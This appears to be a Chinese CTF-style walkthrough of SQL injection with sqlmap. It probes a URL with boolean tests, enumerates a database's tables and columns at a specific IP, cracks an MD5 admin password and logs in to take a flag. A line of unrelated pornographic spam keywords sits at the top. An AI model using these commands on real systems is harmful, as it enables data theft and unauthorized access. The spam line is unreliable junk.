亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

sqlmap注入圖文詳解

 更新時(shí)間:2021年08月11日 15:18:43   作者:徐林2333  
sqlmap 是一個(gè)自動(dòng)SQL 射入工具。本文收集了一些利用Sqlmap做注入測(cè)試的TIPS,其中也包含一點(diǎn)繞WAF的技巧,便于大家集中查閱,希望能給你帶來(lái)幫助

1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測(cè)試一下是否存在漏洞。

地址欄輸入 and 1=1 發(fā)現(xiàn)頁(yè)面正常顯示。

在這里插入圖片描述

再次輸入and 1=2 頁(yè)面出現(xiàn)錯(cuò)誤,說(shuō)明該頁(yè)面可能存在sql注入漏洞

在這里插入圖片描述

2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測(cè)試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

在這里插入圖片描述

3.可以看到存在注入漏洞,掃到了5個(gè)數(shù)據(jù)庫(kù)。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個(gè)數(shù)據(jù)庫(kù)存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

在這里插入圖片描述

4.接下來(lái)查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

在這里插入圖片描述

5.上一步可以看到,name,password 是不是很熟悉。ok接下來(lái)我們開始獲取這兩列的數(shù)據(jù)。

在這里插入圖片描述

在這里插入圖片描述

6.可以看到password是經(jīng)過(guò)md5加密,接下來(lái)我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里

在這里插入圖片描述

7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前?。。?!找到后臺(tái)地址進(jìn)行登錄。

在這里插入圖片描述

8.END 登錄成功,拿到flag,提交。Gameover !

總結(jié)

本篇文章就到這里了,希望能給你帶來(lái)幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!

相關(guān)文章

最新評(píng)論